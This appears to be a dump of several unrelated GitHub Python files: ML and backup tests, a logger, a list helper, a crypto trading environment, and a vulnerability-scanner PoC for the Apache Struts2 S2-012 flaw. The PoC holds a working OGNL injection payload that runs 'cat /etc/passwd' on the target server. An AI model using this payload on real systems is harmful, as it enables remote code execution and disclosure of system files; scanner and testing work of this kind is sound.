[RewardEvents.reward_original, RewardEvents.reward_processed]\n\n\ndef test_action_monitoring():\n \"\"\" Action logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=True, reward_logging=False)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n\n # test 
application of wrapper\n for ii in range(2):\n env.step(env.action_space.sample())\n\n action_events = env.get_last_step_events(query=[ActionEvents.discrete_action,\n ActionEvents.continuous_action,\n ActionEvents.multi_binary_action])\n\n assert len(action_events) == 7\n for event in action_events:\n if event.attributes['name'] in ['action_0_0', 'action_0_1_0', 'action_0_1_1', 'action_1_0']:\n assert event.interface_method == ActionEvents.discrete_action\n elif event.attributes['name'] in ['action_0_2', 'action_2_0']:\n assert event.interface_method == ActionEvents.continuous_action\n elif event.attributes['name'] in ['action_1_1']:\n assert event.interface_method == ActionEvents.multi_binary_action\n else:\n raise ValueError\n\n","repo_name":"enlite-ai/maze","sub_path":"maze/test/core/wrappers/test_monitoring_wrapper.py","file_name":"test_monitoring_wrapper.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"92"} +{"seq_id":"38593459455","text":"'''Test for rsync module'''\n\nimport pytest\nfrom unittest.mock import create_autospec\nfrom unittest.mock import call, patch\nfrom pathlib import Path\n\nfrom hazelsync.job.pgsql import PgsqlJob\nfrom hazelsync.backend.dummy import DummyBackend\nfrom hazelsync.utils.rsync import DEFAULT_PATH\n\n@pytest.fixture(scope='function')\ndef backend(tmp_path):\n return DummyBackend(tmp_path)\n\n@pytest.fixture(scope='function')\ndef private_key(tmp_path):\n key = tmp_path / 'backup.key'\n key.write_text('')\n return key\n\nclass TestRsync:\n def test_create(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['host01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n assert isinstance(job, PgsqlJob)\n\n @patch('hazelsync.job.rsync.PATH', DEFAULT_PATH)\n def test_backup(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['master01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n with patch('hazelsync.job.rsync.rsync_run') as rsync, \\\n patch('subprocess.run') as subprocess:\n job.backup()\n options = ['-a', '-R', '-A', '--numeric-ids']\n args = {'source': Path('/data/pgsql'), 'options': options, 'includes': None, 'excludes': [Path('/data/wal')], 'private_key': private_key, 'user': 'root'}\n rsync.assert_called_with(source_host='master01', destination=backend.tmp_dir/'master01', **args)\n backup_pre_script = '''psql -c \"SELECT pg_start_backup('hazelsync', true);\"'''\n backup_post_script = '''psql -c \"SELECT pg_stop_backup();\"'''\n print(subprocess.mock_calls)\n calls = [\n call(['ssh', '-l', 'root', '-i', str(private_key), 'master01', backup_pre_script], check=True, shell=False, stderr=-1, stdout=-1, timeout=120, env=dict(PATH=DEFAULT_PATH)),\n call(['ssh', '-l', 'root', '-i', str(private_key), 'master01', backup_post_script], check=True, shell=False, stderr=-1, stdout=-1, timeout=120, env=dict(PATH=DEFAULT_PATH)),\n ]\n assert subprocess.mock_calls == calls\n subprocess.assert_has_calls(calls)\n\n def test_stream(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['master01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n with patch('hazelsync.job.pgsql.rsync_run') as rsync:\n job.stream()\n options = ['-a', '-R', '-A', '--numeric-ids', '--remove-source-files']\n args = {'source': Path('/data/wal'), 'options': options, 'private_key': private_key, 'user': 'root'}\n 
rsync.assert_called_with(source_host='master01', destination=backend.tmp_dir/'master01', **args)\n","repo_name":"Japannext/hazelsync","sub_path":"tests/job/test_pgsql.py","file_name":"test_pgsql.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40932745321","text":"from cnn_split_cifar import train\n\nif __name__ == \"__main__\":\n LRs = [1e-5, 1e-4, 1e-3]\n BSs = [32, 64, 128]\n decays = [0, 1e-5, 1e-4]\n seeds = [42]\n \n for lr in LRs:\n for bs in BSs:\n for w_d in decays:\n for seed in seeds:\n conf = {\"seed\": seed, \"train_bs\": bs, \n \"lr\": lr, \"w_decay\": w_d}\n running_acc, single_acc = train(**conf)\n print(f\"seed: {seed}\")\n print(f\"lr: {lr}\")\n print(f\"batch size: {bs}\")\n print(f\"weight decay: {w_d}\")\n print(f\"running avg test acc: {running_acc}\") \n print(f\"each task's individual acc: {single_acc}\")\n","repo_name":"bainro/active_dendrites","sub_path":"grid_search_cnn.py","file_name":"grid_search_cnn.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"71451426540","text":"monthconversion={\n 1:\"January\",\n 2:\"February\",\n 3:\"March\",\n 4:\"April\",\n \"Jun\":\"June\",\n}\nvalue=monthconversion[1]\nvalue=monthconversion.get(2)\nvalue=monthconversion.get(5)\nprint(monthconversion.get(5,\"Invalid choice\"))\nprint(monthconversion.get(5),\"Invalid choice\")\nmonthconversion[5]=\"May\"\nthisdict = dict(name = \"John\", age = 36, country = \"Norway\") #to convert to or create a dictionary\nx=monthconversion.keys() #returns list of all the keys gets updated everytime you add new value to dict\ny=monthconversion.values() #returns list of all the values gets updated everytime you add new value to dict\nz=monthconversion.items() #Get a list of the key:value pairs as tuples\nmonthconversion.update({4:\"July\"}) #to update a value also use to add new item\n\n# pop() to delete a item clear() to delete whole dictionary\n#.pop() is used to delete the key,value pair and store value in another variable\ndel monthconversion[\"Jun\"] \nmonth=dict(monthconversion) #.copy() is also used to copy a dictionary\n\n#Access items in list\nfor key,value in month.items():\n print(key,value)\n\n","repo_name":"SuyashAgarwal14/Python-basics","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18059185666","text":"# -*- coding: utf-8 -*-\nimport logging\nimport logging.config\n\nfrom amplify.agent.common.context import context\n\ntry:\n import thread\nexcept ImportError:\n # Renamed in Python 3\n import _thread as thread\n\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) Nginx, Inc. 
All rights reserved.\"\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\nLOGGERS_CACHE = {}\n\n\nclass NAASLogRecord(logging.LogRecord):\n def __init__(self, *args, **kwargs):\n logging.LogRecord.__init__(self, *args, **kwargs)\n thread_id = thread.get_ident()\n self.action_id = context.action_ids.get(thread_id, 0)\n\n\nclass NAASLogger(logging.getLoggerClass()):\n @staticmethod\n def makeRecord(name, level, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None):\n return NAASLogRecord(name, level, fn, lno, msg, args, exc_info, func)\n\n\nlogging.setLoggerClass(NAASLogger)\n\n\ndef setup(logger_file):\n logging.config.fileConfig(logger_file)\n\n\ndef get(log_name):\n \"\"\"\n Creates logger object to specified log and caches it in LOGGERS_CACHE dict\n\n :param log_name: log name\n :return: logger object\n \"\"\"\n if log_name not in LOGGERS_CACHE:\n logger = logging.getLogger(log_name)\n LOGGERS_CACHE[log_name] = logger\n return LOGGERS_CACHE[log_name]\n\n\ndef get_debug_handler(log_file):\n \"\"\"\n returns a file handler for debug log file\n :param log_file: str log file\n :return: FileHandler obj\n \"\"\"\n handler = logging.FileHandler(log_file, 'a')\n formatter = logging.Formatter('%(asctime)s [%(process)d] %(action_id)s %(threadName)s %(message)s')\n handler.setFormatter(formatter)\n return handler\n","repo_name":"nginxinc/nginx-amplify-agent","sub_path":"amplify/agent/common/util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"92"} +{"seq_id":"26376926674","text":"#By default id is not showed\n\nfrom citoplasma.pages import Pages\nfrom citoplasma.urls import add_get_parameters\nfrom citoplasma.sessions import get_session\nfrom citoplasma.i18n import I18n\nfrom bottle import request\nimport sys\n\nclass SimpleList:\n \n def __init__(self, model, url, t):\n \n self.t=t\n \n self.model=model\n \n if len(self.model.forms)==0:\n \n self.model.create_forms()\n \n self.fields=model.fields.keys()\n \n self.fields_showed=self.fields\n \n self.url=url\n \n self.limit_pages=20\n \n self.order_defaults=['ASC', 'DESC']\n \n self.order_class=['up', 'down']\n \n self.s=get_session()\n \n #self.s['order']=self.s.get('order', 0)\n \n self.order_by=self.order_defaults[0]\n \n self.change_order={}\n \n self.yes_search=True\n \n self.search_text=''\n \n self.initial_num_pages=20\n \n request.query.get('begin_page', '0')\n \n try: \n \n self.begin_page=int(request.query.begin_page)\n \n except ValueError:\n self.begin_page=0\n \n if self.begin_page<0:\n self.begin_page=0\n \n self.search_fields=self.fields\n \n #self.yes_options=True\n \n self.arr_extra_fields=[I18n.lang('common', 'options', 'Options')]\n \n self.arr_extra_options=[SimpleList.standard_options]\n \n self.jln='<br />'\n\n def restore_fields(self):\n self.fields=self.model.fields.keys()\n \n def obtain_order(self):\n \n self.s['order']=self.s.get('order', 0)\n \n order_k=self.s['order']\n \n #Obtain from get\n \n if 'order' in request.query.keys():\n \n order_k=int(request.query.get('order', 0))\n \n if order_k>1 or order_k<0:\n order_k=0\n \n self.order_by=self.order_defaults[ order_k ]\n \n self.s['order']=order_k\n \n self.s.save()\n \n def obtain_field_search(self):\n \n self.s['order_field']=self.s.get('order_field', self.model.name_field_id)\n \n field_k=self.s['order_field']\n \n if 'order_field' in request.query.keys():\n field_k=request.query.order_field\n \n if 
field_k in self.model.fields.keys():\n            \n            self.s['order_field']=field_k\n        \n        for field in self.fields:\n            self.change_order[field]=self.s['order']\n        \n        if self.s['order']==0:\n            self.change_order[field_k]=1\n        else:\n            self.change_order[field_k]=0\n        \n        self.s.save()\n        \n        self.order_field=self.s['order_field']\n        \n    def search(self):\n        \n        request.query.get('search_text', '')\n        \n        self.search_text=request.query.search_text\n        \n        self.search_text=self.search_text.replace('\"', '&quot;')\n        \n        #self.model.conditions='AND \n        \n        self.search_field=request.query.get('search_field', '')\n        \n        if self.search_field not in self.model.fields.keys():\n            self.search_field=''\n        \n        if self.search_field!='' and self.search_text!='':\n            self.model.conditions[0]+=' AND '+self.search_field+' LIKE %s'\n            self.model.conditions[1]=['%'+self.search_text+'%']\n        \n        pass\n    \n    def set_options(self, options_func, arr_row):\n        #SimpleList.standard_options(arr_row)\n        return self.jln.join(options_func(self.url, arr_row[self.model.name_field_id], arr_row)) \n        \n    @staticmethod\n    def standard_options(url, id, arr_row):\n        options=[]\n        options.append('<a href=\"'+add_get_parameters(url, op_admin=1, id=id)+'\">'+I18n.lang('common', 'edit', 'Edit')+'</a>')\n        options.append('<a href=\"'+add_get_parameters(url, op_admin=3, id=id)+'\">'+I18n.lang('common', 'delete', 'Delete')+'</a>')\n        return options\n    \n    def show(self):\n        \n        self.obtain_order()\n        \n        self.obtain_field_search()\n        \n        self.search()\n        \n        total_elements=self.model.select_count()\n        \n        num_elements=self.limit_pages\n        \n        link=add_get_parameters(self.url, search_text=self.search_text, search_field=self.search_field)\n        \n        begin_page=self.begin_page\n        \n        self.model.order_by='order by '+self.order_field+' '+self.order_by\n        \n        self.model.limit='limit '+str(begin_page)+','+str(self.limit_pages)\n        \n        list_items=self.model.select(self.fields)\n        \n        pages=Pages.show( begin_page, total_elements, num_elements, link ,initial_num_pages=self.initial_num_pages, variable='begin_page', label='', func_jscript='')\n        \n        self.begin_page=str(self.begin_page)\n        \n        return self.t.load_template('utils/list.phtml', simplelist=self, list=list_items, pages=pages)\n    \n","repo_name":"webtsys/paramecio","sub_path":"citoplasma/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28263501606","text":"# coding: utf-8\n\nfrom CScanPoc.thirdparty import requests\nfrom CScanPoc import ABPoc, ABVuln, VulnLevel, VulnType\n\n\nclass Vuln(ABVuln):\n    vuln_id = 'Apache_Struts_0007_p'  # platform vulnerability ID, leave empty\n    name = 'Apache Struts2 S2-012 Remote Code Execution'  # vulnerability name\n    level = VulnLevel.HIGH  # vulnerability severity\n    type = VulnType.RCE  # vulnerability type\n    disclosure_date = '2013-05-23'  # disclosure date\n    desc = '''\n    A vulnerability exists in Apache Struts2.\n\n    OGNL provides, among other features, extensive expression-evaluation capabilities.\n\n    A request that includes a specially crafted request parameter can be used to inject arbitrary OGNL code into a property, which is later used as a redirect-address request parameter and evaluated again, leading to remote code execution.\n    '''  # vulnerability description\n    ref = 'https://cwiki.apache.org/confluence/display/WW/S2-012'  # reference\n    cnvd_id = 'Unknown'  # CNVD ID\n    cve_id = 'CVE-2013-1965'  # CVE ID\n    product = 'Apache-Struts'  # affected product\n    product_version = 'Apache Struts2.0.0 - 2.3.13'  # affected versions\n\n\nclass Poc(ABPoc):\n    poc_id = '99c959f7-41b8-4747-bf28-500847b43485'\n    author = 'cscan'  # PoC author\n    create_date = '2018-04-17'  # PoC creation date\n\n    def __init__(self):\n        super(Poc, self).__init__(Vuln())\n        self.option_schema = {\n            'properties': {\n                'base_path': {\n                    'type': 'string',\n                    'description': 'deployment path',\n                    'default': '',\n                    '$default_ref': {\n                        'property': 'deploy_path'\n                    }\n                }\n            }\n        }\n\n    def 
verify(self):\n        self.target = self.target.rstrip(\n            '/') + '/' + (self.get_option('base_path').lstrip('/'))\n        try:\n\n            self.output.info('Starting scan of {target} for {vuln}'.format(\n                target=self.target, vuln=self.vuln))\n            payload = {'name': '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"cat\",\"/etc/passwd\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'}\n            request = requests.get(\n                '{target}/user.action'.format(target=self.target), params=payload)\n            r = request.text\n            if 'root:x:0:0:root:/root:/bin/bash' in r:\n                self.output.report(self.vuln, 'Found {name} vulnerability on {target}'.format(\n                    target=self.target, name=self.vuln.name))\n\n        except Exception as e:\n            self.output.info('Execution exception: {}'.format(e))\n\n    def exploit(self):\n        self.verify()\n\n\nif __name__ == '__main__':\n    Poc().run()\n","repo_name":"qsdj/cncs-armory-ktrimisu","sub_path":"pocs/middleware/Apache-Struts/Apache_Struts_0007_p.py","file_name":"Apache_Struts_0007_p.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"92"} +{"seq_id":"42990054631","text":"from itertools import count\nfrom typing import List, Optional, Tuple, Union\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers import (\n    BatchEncoding,\n    CLIPModel,\n    CLIPProcessor,\n    LlamaConfig,\n    LlamaForCausalLM,\n    LlamaModel,\n)\nfrom transformers.modeling_outputs import (\n    BaseModelOutputWithPast,\n    CausalLMOutputWithPast,\n)\n\n\nclass ClimaConfig(LlamaConfig):\n    model_type = \"clima\"\n\n\nclass ClimaModel(LlamaModel):\n    config_class = ClimaConfig\n\n    def __init__(self, config: LlamaConfig):\n        super(ClimaModel, self).__init__(config)\n\n        if hasattr(config, \"mm_vision_tower\"):\n            # HACK: wrap in list to not make vision model count as a parameter\n            self.vision_tower = [CLIPModel.from_pretrained(config.mm_vision_tower)]\n\n        if hasattr(config, \"use_mm_proj\"):\n            self.mm_projector = nn.Linear(config.mm_hidden_size, config.hidden_size)\n\n    def initialize_vision_modules(self, vision_tower, mask_token_id, pretrain_mm_mlp_adapter=None, **kwargs):\n        self.config.mm_vision_tower = vision_tower\n\n        processor = CLIPProcessor.from_pretrained(vision_tower)\n\n        if not hasattr(self, 'vision_tower'):\n            # hack to make clip model work with device_map=\"auto\"\n            CLIPModel._no_split_modules = CLIPModel._no_split_modules or ['CLIPTextTransformer', 'CLIPVisionTransformer']\n            vision_tower = CLIPModel.from_pretrained(vision_tower, torch_dtype=self.dtype, **kwargs)\n        else:\n            vision_tower = self.vision_tower[0]\n        vision_tower.requires_grad_(False)\n        self.vision_tower = [vision_tower]\n\n        vision_config = vision_tower.config\n\n        self.config.use_mm_proj = True\n        self.config.mm_hidden_size = vision_config.projection_dim\n        vision_config.im_patch_token = mask_token_id\n        vision_config.num_patches = 1 # since we use the pooled, projected output\n\n        if not hasattr(self, 'mm_projector'):\n            self.mm_projector = nn.Linear(vision_config.projection_dim, self.config.hidden_size, dtype=self.dtype, device=self.device)\n\n        if pretrain_mm_mlp_adapter is not None:\n            mm_projector_weights = torch.load(pretrain_mm_mlp_adapter, map_location=self.device)\n            self.mm_projector.load_state_dict({k.split('.')[-1]: v for k, v in 
mm_projector_weights.items()})\n\n return dict(\n processor=processor,\n vision_config=vision_config\n )\n\n # https://stackoverflow.com/a/57208704\n def _apply(self, fn):\n super()._apply(fn)\n if hasattr(self, \"vision_tower\"):\n self.vision_tower = [vis._apply(fn) for vis in self.vision_tower]\n return self\n\n def get_vision_features(self, text_or_image, *args, **kwargs):\n if isinstance(text_or_image, (BatchEncoding, dict)):\n if \"pixel_values\" in text_or_image:\n embeds = self.vision_tower[0].get_image_features(*args, **text_or_image, **kwargs)\n else:\n embeds = self.vision_tower[0].get_text_features(*args, **text_or_image, **kwargs)\n else:\n if text_or_image.dim() == 4:\n embeds = self.vision_tower[0].get_image_features(text_or_image, *args, **kwargs)\n else:\n embeds = self.vision_tower[0].get_text_features(text_or_image, *args, **kwargs)\n\n return embeds.unsqueeze(1)\n\n def is_tensor(self, thing):\n if isinstance(thing, (BatchEncoding, dict)):\n return all(isinstance(v, torch.Tensor) for v in thing.values())\n return isinstance(thing, torch.Tensor)\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n images: Optional[Union[BatchEncoding, torch.FloatTensor]] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids)\n\n vision_tower = getattr(self, 'vision_tower', None)\n if vision_tower is not None and (input_ids.shape[1] != 1 or self.training) and images is not None:\n vision_tower = vision_tower[0]\n with torch.no_grad():\n if self.is_tensor(images):\n image_features = self.get_vision_features(images)\n # variable length images or texts / multimodal inputs with both image and texts\n elif isinstance(images, (BatchEncoding, dict)): # BatchEncoding of lists of tensor\n image_features = []\n try:\n for idx in count():\n image_feature = self.get_vision_features({k: v[idx].unsqueeze(0) for k, v in images.items()})\n image_features.append(image_feature)\n except IndexError:\n pass\n elif isinstance(images[0], (BatchEncoding, dict)): # list of BatchEncoding of tensor\n image_features = []\n for image in images:\n image_feature = self.get_vision_features({k: v.unsqueeze(0) for k, v in image.items()})\n image_features.append(image_feature)\n else: # same, but only the list\n for image in images:\n image_feature = self.get_vision_features(image.unsqueeze(0))\n image_features.append(image_feature)\n if self.is_tensor(images):\n image_features = self.mm_projector(image_features)\n else:\n image_features = [self.mm_projector(image_feature)[0] for image_feature in image_features]\n dummy_image_features = torch.zeros(len(image_features[0]), self.config.mm_hidden_size, device=inputs_embeds.device, dtype=inputs_embeds.dtype)\n dummy_image_features = self.mm_projector(dummy_image_features)\n\n new_input_embeds = []\n cur_image_idx = 0\n for cur_input_ids, cur_input_embeds in zip(input_ids, inputs_embeds):\n if (cur_input_ids == vision_tower.config.im_patch_token).sum() == 0:\n # multimodal LLM, but the current sample is not multimodal\n cur_input_embeds = cur_input_embeds + (0. 
* dummy_image_features).sum()\n new_input_embeds.append(cur_input_embeds)\n cur_image_idx += 1\n continue\n\n cur_image_features = image_features[cur_image_idx]\n num_patches = cur_image_features.shape[0]\n if (cur_input_ids == vision_tower.config.im_patch_token).sum() != num_patches:\n raise ValueError(\"The number of image patch tokens should be the same as the number of image patches.\")\n masked_indices = torch.where(cur_input_ids == vision_tower.config.im_patch_token)[0]\n mask_index_start = masked_indices[0]\n if (masked_indices != torch.arange(mask_index_start, mask_index_start+num_patches, device=masked_indices.device, dtype=masked_indices.dtype)).any():\n raise ValueError(\"The image patch tokens should be consecutive.\")\n cur_new_input_embeds = torch.cat((cur_input_embeds[:mask_index_start], cur_image_features, cur_input_embeds[mask_index_start+num_patches:]), dim=0)\n new_input_embeds.append(cur_new_input_embeds)\n cur_image_idx += 1\n\n inputs_embeds = torch.stack(new_input_embeds, dim=0)\n\n return super(ClimaModel, self).forward(\n input_ids=None, attention_mask=attention_mask, past_key_values=past_key_values,\n inputs_embeds=inputs_embeds, use_cache=use_cache,\n output_attentions=output_attentions, output_hidden_states=output_hidden_states,\n return_dict=return_dict\n )\n\n\nclass ClimaForCausalLM(LlamaForCausalLM):\n config_class = ClimaConfig\n\n def __init__(self, config):\n super(LlamaForCausalLM, self).__init__(config)\n self.model = ClimaModel(config)\n\n self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_model(self):\n return self.model\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n images: Optional[Union[BatchEncoding, torch.FloatTensor]] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n outputs = self.model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n images=images\n )\n\n hidden_states = outputs[0]\n logits = self.lm_head(hidden_states)\n\n loss = None\n if labels is not None:\n # Shift so that tokens < n predict n\n shift_logits = logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n # Flatten the tokens\n loss_fct = CrossEntropyLoss()\n shift_logits = shift_logits.view(-1, self.config.vocab_size)\n shift_labels = shift_labels.view(-1)\n # Enable model/pipeline parallelism\n shift_labels = shift_labels.to(shift_logits.device)\n loss = loss_fct(shift_logits, shift_labels)\n\n if not return_dict:\n output = (logits,) + outputs[1:]\n 
return (loss,) + output if loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=loss,\n logits=logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def prepare_inputs_for_generation(\n self, input_ids, past_key_values=None, attention_mask=None, inputs_embeds=None, **kwargs\n ):\n if past_key_values:\n input_ids = input_ids[:, -1:]\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"past_key_values\": past_key_values,\n \"use_cache\": kwargs.get(\"use_cache\"),\n \"attention_mask\": attention_mask,\n \"images\": kwargs.get(\"images\", None),\n }\n )\n return model_inputs\n","repo_name":"potamides/AutomaTikZ","sub_path":"automatikz/model/clima/modeling_clima.py","file_name":"modeling_clima.py","file_ext":"py","file_size_in_byte":11954,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"92"} +{"seq_id":"32184273527","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom gym import spaces\nimport matplotlib.pyplot as plt\n\n\nclass cryptoEnv(object):\n r\"\"\"A trading currency env that works in similar fashion to OpenAI gym\n Sends a state at time (t) at every step (minute/hour/day/week)\n ---> CSV must be set in latest-oldest prices\n Args:\n dataset: CSV dataset with OHLC (Open, High, Low, Close) prices\n available_cash: Amount of money that can be used to trade\n purchase_size: Percentage of the crypto currency that can be purchased\n --> [0,1] range \n n_actions: Number of availabe actions\n --> I.E. 
if n_actions = 10:\n                        [0-9] sell, [10] hold, [11-19] buy == 20 total actions\n        loss_limit: Stops when the wallet loses X fraction of its money \n                --> Start with $1000, stop when there is less than $700 total\n                    set loss_limit to 0.7\n        min_max: Sets preprocessing to between [0,1] else it will use standard scaler\n        SEED: numpy random seed\n    Shape (State):\n        Prices are scaled.\n        [Open, High, Low, Close, Crypto Wallet, USD_Wallet]\n    Examples:\n        -- s = env.reset()\n        -- done = False\n        -- while not done:\n        --     action = agent.pick_action(s)\n        --     s' , reward, done, info = env.step(action)\n        --     s = s'\n    \"\"\"\n    def __init__(self,\n                 dataset,\n                 available_cash,\n                 purchase_size=1,\n                 n_actions=10,\n                 loss_limit=0.7,\n                 min_max=True,\n                 SEED=1337):\n        np.random.seed(SEED)\n        self.loss_limit = loss_limit\n        if min_max:\n            self.scaler = MinMaxScaler()\n        else:\n            self.scaler = StandardScaler()\n        self.dataset = dataset\n        self.price: float = None\n        self.purchase_size = purchase_size\n        self.available_cash = available_cash\n        self.usd_wallet: float = None\n        self.crypto_wallet: float = None\n        self.reward_dec: float = 1.0\n        self.time_step: int = 0\n        self.OHLC_shape = None\n        self.scaled_stock_prices = None\n        self.n_steps = None\n        self.action_set = np.arange(-n_actions, n_actions)\n        self.action_space = spaces.Discrete(len(self.action_set))\n        self.obs_space = None\n        self.portfolio, self.price_history = [], []\n        self.scaled_prices = None\n        self.OHLC_unscaled = self._load()\n        self.episode = 0\n\n    def _load(self):\n        df = pd.read_csv(self.dataset)\n        df = df.iloc[::-1]\n        df = df.dropna()\n        OHLC_prices = df.values\n        self.scaled_prices = self.scaler.fit_transform(df)\n        self.n_steps, self.OHLC_shape = OHLC_prices.shape\n        # OHLC + Crypto Wallet + USD Wallet\n        self.obs_space = np.empty(self.OHLC_shape + 2, dtype=float)  # np.float was removed in NumPy 1.24\n        return OHLC_prices\n\n    def save_records(self):\n        if not os.path.exists('history'):\n            os.mkdir('history')\n        plt.title(\"Price History\")\n        plt.xlabel(\"Time Steps\")\n        plt.ylabel(\"Price $(USD)\")\n        plt.plot(self.portfolio, label='Portfolio Total Balance')\n        plt.plot(self.price_history, label='price')\n        plt.legend()\n        plt.savefig(f'history/episode_{self.episode}')\n        plt.show()\n        plt.clf()\n        self.episode += 1\n\n    def reset(self):\n        self.portfolio, self.price_history = [], []\n        self.time_step = 0\n        self.crypto_wallet = 0\n        self.usd_wallet = self.available_cash\n        self._get_price()\n        self.reward_dec -= 1e-3 if self.reward_dec > 0 else 0\n        return self._get_obs()\n\n    def step(self, a):\n        assert (0 <= a < len(self.action_set)), \"Invalid Action\"  # a == len(action_set) would be out of range\n        self.portfolio.append(self.usd_wallet + self.crypto_wallet)\n        self.price_history.append(self.price)\n        reward = 0.0\n        prev_holding = self._get_holdings()\n        self._trade(a)\n        self.time_step += 1\n        self._update_wallets()\n        cur_holdings = self._get_holdings()\n\n        profit = cur_holdings / prev_holding\n\n        if cur_holdings < self.loss_limit * self.available_cash:\n            done = True\n        else:\n            reward += 1\n            done = (self.time_step == self.n_steps - 5)\n\n        INFO = {\"HOLDINGS\": cur_holdings, \"PROFIT\": profit}\n\n        if profit > 1.0:\n            reward += (profit * self.reward_dec) + 1\n        else:\n            reward += (profit * self.reward_dec) - 1\n\n        obs_ = self._get_obs()\n        return obs_, reward, done, INFO\n\n    def _get_holdings(self):\n        return self.crypto_wallet + self.usd_wallet\n\n    def _get_obs(self):\n        self.obs_space[:4] = self.scaled_prices[self.time_step]\n        self.obs_space[4] = self.crypto_wallet\n        
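# state layout: obs[0:4] = scaled OHLC row for the current step, obs[4] = crypto wallet, obs[5] = USD wallet\n        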
self.obs_space[5] = self.usd_wallet\n        return self.obs_space\n\n    def _trade(self, a):\n        a -= len(self.action_set) // 2  # centre the Discrete index on hold (was hard-coded 10, which only matched n_actions=10)\n        a *= (self.price * self.purchase_size)\n        if a < 0:\n            self._buy_or_sell(a, purchase=False)\n        elif a > 0:\n            self._buy_or_sell(a, purchase=True)\n        elif a == 0:\n            return\n        else:\n            print(\"Not a valid action\")\n            return\n\n    def _buy_or_sell(self, amount, purchase):\n        amount = abs(amount)\n        if purchase:\n            if self.usd_wallet <= 0:\n                return\n            if self.usd_wallet >= amount:\n                self.usd_wallet -= amount\n                self.crypto_wallet += amount\n        else:\n            if self.crypto_wallet <= 0:\n                return\n            if self.crypto_wallet >= amount:\n                self.crypto_wallet -= amount\n                self.usd_wallet += amount\n\n    def _get_price(self):\n        self.price = self.OHLC_unscaled[self.time_step][3]\n\n    def _update_wallets(self):\n        self.crypto_wallet *= (self.OHLC_unscaled[self.time_step + 1][3] /\n                               self.price)\n","repo_name":"alantess/cryptogym","sub_path":"cryptogym/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} 